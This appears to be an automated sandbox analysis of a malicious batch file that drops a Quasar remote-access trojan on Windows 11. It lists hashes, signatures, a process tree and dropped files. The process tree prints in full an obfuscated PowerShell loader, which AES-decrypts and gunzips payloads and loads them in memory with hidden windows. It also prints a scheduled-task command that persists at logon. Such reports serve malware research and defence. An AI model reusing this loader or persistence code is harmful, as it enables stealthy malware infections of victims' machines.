Analysis
-
max time kernel
0s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64 arch:x86 image:win11-20240508-en locale:en-us os:windows11-21h2-x64 system -
submitted
28-06-2024 22:53
Static task
static1
General
-
Target
testing.bat
-
Size
370KB
-
MD5
df396b97b5de6c7ab17a021681980c9b
-
SHA1
5a794a857884e1ec35eb225397ee6d3a5680af22
-
SHA256
9db155af18a56368ff0d18ab954438bbb14ec90a7cacc603f66ce5468e4bf3c4
-
SHA512
96a6423ff510d21cfa9e385e38c3d65e3b2f65cb3309082b734358e1f7b097be44276b74d64b62c5957bb554f1c97dabd889aedea0306441b4431d57636a3848
-
SSDEEP
6144:ELpy5tbQpHYdQgYl7nIVTgunq/hdnN5cAZVQw3g+glYY8UdKmq5:p7QHY2lboguq//N+AQwfglYvF5
Malware Config
Extracted
quasar
-
reconnect_delay
5000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3880-75-0x0000000007710000-0x0000000007758000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exe powershell.exe powershell.exe pid process 3880 powershell.exe 3560 powershell.exe 3460 powershell.exe
Processes
-
C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\testing.bat" 1⤵ PID:5040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FkenHL2OG+TYr4GLR0foZuRMV6VKNesGlzUIpfTgBFk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QBB/ZOZrEm9IOU0Xu/iBug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRfwC=New-Object System.IO.MemoryStream(,$param_var); $nYQyQ=New-Object System.IO.MemoryStream; $pUpSy=New-Object System.IO.Compression.GZipStream($NRfwC, [IO.Compression.CompressionMode]::Decompress); $pUpSy.CopyTo($nYQyQ); $pUpSy.Dispose(); $NRfwC.Dispose(); $nYQyQ.Dispose(); $nYQyQ.ToArray();}function execute_function($param_var,$param2_var){ $EBCxv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Srqon=$EBCxv.EntryPoint; $Srqon.Invoke($null, $param2_var);}$PfOfJ = 'C:\Users\Admin\AppData\Local\Temp\testing.bat';$host.UI.RawUI.WindowTitle = $PfOfJ;$FHPTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PfOfJ).Split([Environment]::NewLine);foreach ($yJrJm in $FHPTQ) { if ($yJrJm.StartsWith(':: ')) { $KDOrR=$yJrJm.Substring(3); break; }}$payloads_var=[string[]]$KDOrR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
PID:3560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_650_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_650.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force 3⤵
- Command and Scripting Interpreter: PowerShell
PID:3460 -
C:\Windows\SysWOW64\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_650.vbs" 3⤵ PID:1564
-
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_650.bat" " 4⤵ PID:1892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FkenHL2OG+TYr4GLR0foZuRMV6VKNesGlzUIpfTgBFk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QBB/ZOZrEm9IOU0Xu/iBug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NRfwC=New-Object System.IO.MemoryStream(,$param_var); $nYQyQ=New-Object System.IO.MemoryStream; $pUpSy=New-Object System.IO.Compression.GZipStream($NRfwC, [IO.Compression.CompressionMode]::Decompress); $pUpSy.CopyTo($nYQyQ); $pUpSy.Dispose(); $NRfwC.Dispose(); $nYQyQ.Dispose(); $nYQyQ.ToArray();}function execute_function($param_var,$param2_var){ $EBCxv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Srqon=$EBCxv.EntryPoint; $Srqon.Invoke($null, $param2_var);}$PfOfJ = 'C:\Users\Admin\AppData\Roaming\Windows_Log_650.bat';$host.UI.RawUI.WindowTitle = $PfOfJ;$FHPTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PfOfJ).Split([Environment]::NewLine);foreach ($yJrJm in $FHPTQ) { if ($yJrJm.StartsWith(':: ')) { $KDOrR=$yJrJm.Substring(3); break; }}$payloads_var=[string[]]$KDOrR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
PID:3880
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
2KB
MD5 8ba8fc1034d449222856ea8fa2531e28
SHA1 7570fe1788e57484c5138b6cead052fbc3366f3e
SHA256 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA512 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
Filesize
18KB
MD5 933fb73dbd2098e46bd27b24fb4031d1
SHA1 e8bc25602b11d63dc94c05f68bcb7b4a4e1675d5
SHA256 e5b2501f4a722392ae525de052142f2bf2096e71833461d6ee7b5d4a83b8915d
SHA512 46c1fcad445cee8db84d11ff1032f4df96180775ad5933ec918b3d38bbd8954e71fa83a22a990b0f195be5d313ce693ba37b1b5261b9914df31619538fa24aaa
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
370KB
MD5 df396b97b5de6c7ab17a021681980c9b
SHA1 5a794a857884e1ec35eb225397ee6d3a5680af22
SHA256 9db155af18a56368ff0d18ab954438bbb14ec90a7cacc603f66ce5468e4bf3c4
SHA512 96a6423ff510d21cfa9e385e38c3d65e3b2f65cb3309082b734358e1f7b097be44276b74d64b62c5957bb554f1c97dabd889aedea0306441b4431d57636a3848
-
Filesize
115B
MD5 6d22072f72ca064725151f80cd04bf57
SHA1 a6aced68e9de35a293ef2855c64946b9c596f64e
SHA256 079389210ed3e04ca1bb335283ff5d37fcfcb97968b8cb173909e4cef7f48ea0
SHA512 8177fdb61da79b8e83efa6010333f486d89c53b58f1d9cd30bdcfb19c020b7220196eeddefcf4830731a07a6f7267b4e29621fb42e85ca6cf2f0209b7e71f56e